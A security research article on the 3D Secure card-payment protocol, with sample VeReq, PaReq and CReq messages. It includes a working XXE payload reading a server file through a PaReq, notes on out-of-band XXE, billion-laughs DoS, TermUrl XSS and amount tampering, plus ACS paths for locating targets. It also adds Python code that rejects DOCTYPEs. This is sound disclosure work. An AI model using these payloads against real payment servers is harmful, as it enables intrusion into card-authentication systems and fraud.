3D Secure, or what the security mechanisms of online payments hide



E-commerce is one of the largest and fastest-growing areas, and so it attracts the attention of both information security researchers and cybercriminals. For that reason I wanted to understand some aspects of the security mechanisms used in online payments.



The protocol in question is 3D Secure, an XML-based protocol for card-not-present payments. It was created by VISA and later adopted by the other card schemes (MasterCard, JCB International, AmEx and others); VISA eventually handed it over to EMVCo, and the current specification is known as EMV 3DS.



What is 3D Secure?



3D Secure stands for Three Domain Secure, after the three domains that take part in a payment:

Issuer domain: the cardholder's bank, which authenticates the cardholder.

Acquirer domain: the merchant and its acquiring bank, which initiate the payment.

Interoperability domain: the infrastructure (card scheme networks, directory servers and so on) that connects the other two domains under 3D Secure. On the merchant side this is handled by a merchant plug-in (MPI), on the issuer side by an access control server (ACS).






3D Secure versions

v1.0 - 2001 -…
v2.0 - 2014 -
v2.1 - 2017
v2.2 - 2018

Version 1.0.2 is still the version most CNP payments go through, and it authenticates the cardholder with an OTP.

Version 1.0.2 dates from 2001.

The current version is v2.2, which EMVCo expects to be rolled out around 2020.






Payment flow



Step 1 is the "verification" stage, handled by the MPI on the merchant side.

The merchant plug-in (MPI) periodically sends a CRReq (Card Range Request) to the directory server and receives the card ranges (BINs) that participate in 3D Secure, so it knows up front whether a card can be enrolled at all.

For a specific card the MPI sends a VeReq (Verification Request) to the directory server, which forwards it to the issuer's ACS to check whether the card is enrolled in 3DS.

The answer comes back as a VeRes (Verification Response).

Step 2: the MPI builds a PaReq (Payment Request) and sends it, through the cardholder's browser, to the ACS.

The ACS receives the PaReq and asks the cardholder for an OTP.

Step 3: once the cardholder enters the OTP, the ACS sends a PaRes (Payment Response) back through the browser to the MPI, which checks it and completes the payment.



What do these messages look like?



CRReq/CRRes are of little interest here; the VeReq/VeRes pair is. A VeReq looks like this:



<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message id="999">
    <VEReq>
      <version>1.0.2</version>
      <pan>4444333322221111</pan>
      <Merchant>
        <acqBIN>411111</acqBIN>
        <merID>99000001</merID>
        <password>99000001</password>
      </Merchant>
      <Browser>
        <deviceCategory>0</deviceCategory>
        <accept>*/*</accept>
        <userAgent>curl/7.27.0</userAgent>
      </Browser>
    </VEReq>
  </Message>
</ThreeDSecure>


The VeReq carries the card PAN together with the merchant's identifiers (acqBIN, merID and password).



<?xml version="1.0" encoding="UTF-8"?>
<ThreeDSecure>
  <Message id="999">
    <VERes>
      <version>1.0.2</version>
      <CH>
        <enrolled>Y</enrolled>
        <acctID>A0fTY+pKUTu/6hcZWZJiAA==</acctID>
      </CH>
      <url>https://dropit.3dsecure.net:9443/PIT/ACS</url>
      <protocol>ThreeDSecure</protocol>
    </VERes>
  </Message>
</ThreeDSecure>


In the VeRes, the message id matches the one in the request. The enrolled status (Y) shows that the card is enrolled in 3D Secure.

The url element is the address of the ACS to which the PaReq will be sent.



PaReq



Once the MPI knows the card is enrolled, it redirects the cardholder's browser to the ACS with a PaReq.



URL: https://site.ru/acs/pareq

MD=5ebde4d3-3796-7a4d-5ebd-e4d300003dd0&PaReq=eJxVUstywjAM%2FBUm98QPDDiMcIc2dMoh0AedKb2ljiDpNAFMUgJfXzuFPnzSrjQraWW4aoqPzieafb4pRx4LqNfBUm%2FSvFyPvOfFrS%2B9KwWLzCBGT6hrgwpi3O%2BTNXbydOS96VDocEX9FePaF1IIPwlF6qeoV7Inqeyh9hTcjx9xp%2BDcSNk%2BAQdygVbR6CwpKwWJ3l1PZ0rwQZ9SIGcIBZpppAaSuse7POwC%2BeagTApUy%2FEsmrwE8Xw2WQJpKdCbuqzMUfWFLb4AqM2HyqpqOyTkcDgExabEY3BMyhSbwNRAXB7I70D3tYv2Vq%2FJUzU7Teg8ejjE7xMWn9Z8Hk35fKEtNx4BcRWQJhUqTplklIoOC4c9NuwOgLQ8JIUbRDHK2vW%2BEWxdk%2FG%2F1F8KrO%2FGnuWyywUBNls7v62wZv7EQH5nvrlzlurKGsUGNOwy0ZfhXf5udlkmV7ey98rfmnjpjG6LnGJubeKUslbSASBOhpxvSM7nt9G%2Fb%2FEFnkK9RA%3D%3D&TermUrl=https%3A%2F%shop.ru%2Fgates%2F3ds


The PaReq is sent as a POST with three parameters:

1) MD: merchant data, an opaque value generated by the MPI to match the PaReq with the returned PaRes;

2) PaReq: the payment request itself, in encoded form;

3) TermUrl: the URL to which the ACS returns the result of the 3D Secure authentication.



Both TermUrl and MD are echoed back by the ACS in its response page. If the ACS does not validate and encode them, this becomes a reflected XSS.



Conclusion №1: the ACS must validate the PaReq parameters!



What is inside the PaReq?

Let's look at the PaReq itself. It is built as XML -> zlib -> base64 -> urlencode, so it is easy to unpack, for example with Burp.






Once decoded, the PaReq is plain XML. It contains the purchase details (purchAmount, amount and currency) and the MessageId (the same as in the VeReq).



The ACS validates the PaReq (in particular, that it really is a PaReq) and answers with a PaRes (Payment Response).



Wherever a server parses XML it receives from outside, the first thing to check is XXE. Let's look.



Different ACS implementations react differently to a malformed PaReq, and their error responses reveal which software is behind them. Some examples:



<ThreeDSecure><Message id="poEpShmja0A36YWe0JOyr4Zt"><Error><version>1.0.2</version><errorCode>99</errorCode><errorMessage>Permanent system failure.</errorMessage><errorDetail>Failed to build error message.</errorDetail></Error></Message></ThreeDSecure>

<errorCode>5</errorCode><errorMessage>Format of one or more elements is invalid according to the specification.</errorMessage>

<errorCode>98</errorCode><errorMessage>Transient system failure</errorMessage>

<errorCode>4</errorCode><errorMessage>Critical element not recognized</errorMessage>


From these responses one can tell which ACS product is in use. Now, XXE.



XXE



A PaReq with an external entity declared, where merID references the entity:



<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ThreeDSecure [<!ENTITY ac SYSTEM "file:///proc/sys/kernel/hostname">]><ThreeDSecure><Message id="123-123-123-123-123-123"><PAReq><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN><merID>&ac;</merID><name>MerchantName</name><country>643</country><url>http://asdas.as</url></Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><amount>202000</amount><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent><desc>AcquirerName</desc></Purchase><CH><acctID>DYasdVQAOX6as3dfcxccwzPCR6Q74eS5</acctID><expiry>2209</expiry></CH></PAReq></Message></ThreeDSecure>


The ACS copies acqBIN, merID, xid, date, purchAmount and currency from the PaReq into the PaRes. So if the ACS resolves the entity, its value comes back inside merID. That is exactly what happened.



The other variant (out-of-band) is an entity pointing at an external URL: if the server resolves it, a request arrives at that URL, which reveals the XXE even when nothing is reflected in the response.



In this case the ACS answered with a PaRes that carried an error, but merID contained the ACS hostname. So although the PaReq was rejected, the entity had already been resolved:



<ThreeDSecure><Message id=" 123-123-123-123-123-123 "><PARes id=" 123-123-123-123-123-123 "><version>1.0.2</version><Merchant><acqBIN>510069</acqBIN>
<merID>ACS server name</merID>
</Merchant><Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><date>20181004 21:34:21</date><purchAmount>202000</purchAmount><currency>643</currency><exponent>2</exponent></Purchase><pan>000000000000000</pan><TX><time>20181004 21:34:21</time><status>U</status></TX><IReq><iReqCode>55</iReqCode><iReqDetail>PAReq.CH.acctID</iReqDetail></IReq></PARes></Message></ThreeDSecure>


With an entity pointing at a URL, the ACS made DNS and HTTP requests to it. Another consequence of the same bug is DoS through a "billion laughs" XXE (recursive entity expansion).
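The PaReq pipeline described above (XML -> zlib -> base64 -> urlencode) together with the check an ACS needs before parsing, rejecting any DOCTYPE so that neither the external-entity case nor the billion-laughs case ever reaches the XML parser, as an added Python example that is not from the original article; the sample PaReq, the inflate limit and the function names are my own assumptions.

```python
import base64
import re
import urllib.parse
import zlib
import xml.etree.ElementTree as ET

# Constructed sample PaReq (not the one captured above), laid out like 3DS 1.0.2.
SAMPLE_PAREQ_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<ThreeDSecure><Message id="999"><PAReq><version>1.0.2</version>'
    '<Merchant><acqBIN>411111</acqBIN><merID>99000001</merID></Merchant>'
    '<Purchase><xid>U3Vic2NyaWJlX0B3ZWJyMGNr</xid><purchAmount>202000</purchAmount>'
    '<currency>643</currency><exponent>2</exponent></Purchase>'
    '</PAReq></Message></ThreeDSecure>'
)
MAX_XML_BYTES = 1 << 20  # assumed inflate limit; a real PaReq is a few KB
# A PaReq never legitimately carries a DOCTYPE, so any DOCTYPE/ENTITY
# declaration (external entity or billion laughs alike) is rejected unparsed.
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)
# The PaRes echoes these PaReq fields back, which is why XXE showed up in merID.
ECHOED_FIELDS = ("Merchant/acqBIN", "Merchant/merID", "Purchase/xid",
                 "Purchase/purchAmount", "Purchase/currency")


def encode_pareq(xml_text: str) -> str:
    """MPI side: XML -> zlib -> base64 -> urlencode."""
    packed = base64.b64encode(zlib.compress(xml_text.encode("utf-8")))
    return urllib.parse.quote(packed, safe="")


def decode_pareq(form_value: str) -> bytes:
    """ACS side: reverse the pipeline, bounding the inflated size."""
    raw = base64.b64decode(urllib.parse.unquote(form_value), validate=True)
    inflater = zlib.decompressobj()
    xml_bytes = inflater.decompress(raw, MAX_XML_BYTES)
    if inflater.unconsumed_tail or not inflater.eof:
        raise ValueError("PaReq inflates past %d bytes or is truncated" % MAX_XML_BYTES)
    return xml_bytes


def parse_pareq(form_value: str) -> dict:
    """Validate a PaReq form value and return the fields the PaRes will echo."""
    xml_bytes = decode_pareq(form_value)
    if _DOCTYPE_RE.search(xml_bytes):
        raise ValueError("PaReq carries a DOCTYPE/ENTITY declaration: rejected")
    pareq = ET.fromstring(xml_bytes).find("./Message/PAReq")
    if pareq is None:
        raise ValueError("no PAReq element")
    fields = {}
    for path in ECHOED_FIELDS:
        node = pareq.find(path)
        if node is None or not node.text:
            raise ValueError("missing element " + path)
        fields[path.split("/")[1]] = node.text
    return fields
```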



Where the ACS is found



Typical ACS URL paths:



/acs/pareq/___uid___
/acspage/cap?RID=14&VAA=B
/way4acs/pa?id=____id____
/PaReqVISA.jsp
/PaReqMC.jsp
/mdpayacs/pareq
/acs/auth/start.do


Typical hostname components:



acs
3ds
3ds
secure
cap
payments
ecm
3dsauth
testacs
card


Otherwise, during a real payment the ACS address is visible in a proxy interceptor.



3D Secure v2.*



Let's see what has changed compared to 3DS v1.0.



Devices



3DS 2.0 supports not only browsers but also native mobile applications, through the 3DS SDK.



In v1, 3DS authentication meant an OTP; v2 allows other authentication methods.



Authentication types






How does 3D Secure v2 work?






The key new component is the Risk Engine. In 1.0.2 every transaction requires an OTP; in 2.* the issuer scores the transaction and may authenticate it without involving the cardholder at all.



v2



3DS 2 schematic



As the diagram shows, the 2.* flow has two branches. The Risk Engine decides which one applies, based on data collected from the browser or from the app (via the 3DS SDK). If the risk is low, the transaction is authenticated without any interaction with the cardholder (frictionless flow); otherwise the cardholder is challenged.






The AReq (authentication request, base64url) carries the data collected about the device and the transaction.



If the Risk Engine considers the transaction risky, the cardholder is challenged, for example with an OTP.






The CReq (base64url JSON), the challenge request, is sent when the ARes indicates the Challenge Flow:



{
  "ThreeDSServerTransID": "8a880dc0-d2d2-4067-bcb1-b08d1690b26e",
  "AcsTransID": "d7c1ee99-9478-44a6-b1f2-391e29c6b340",
  "MessageType": "CReq",
  "MessageVersion": "2.1.0",
  "SdkTransID": "b2385523-a66c-4907-ac3c-91848e8c0067",
  "SdkCounterStoA": "001"
}


When the 3DS SDK is used, the CReq is additionally encrypted (JWE).



CReq parameters



Summary



v1



  • XXE in PaReq:

    • DoS
    • SSRF
  • XSS via TermUrl
  • Blind XSS —
  • PaReq is not signed, unlike PaRes, so the values in it can be tampered with, e.g. 100 instead of 1.


v2



  • Blind XSS —
  • Challenge flow, …


Note that many banks do not run their own ACS but use 3DS as SaaS, so a single vulnerable ACS affects many issuers at once.





https://github.com/w3c/webpayments/wiki

https://www.EMV.com/emv-technologies/3d-secure/

https://3dsserver.netcetera.com/3dsserver-saas/doc/current/schema/3ds-api.html

https://github.com/webr0ck/3D-Secure-audit-cheatsheet



P.S. A question that comes up often: "On AliExpress or Amazon nobody asks me for an OTP; do they use 3DS at all?"



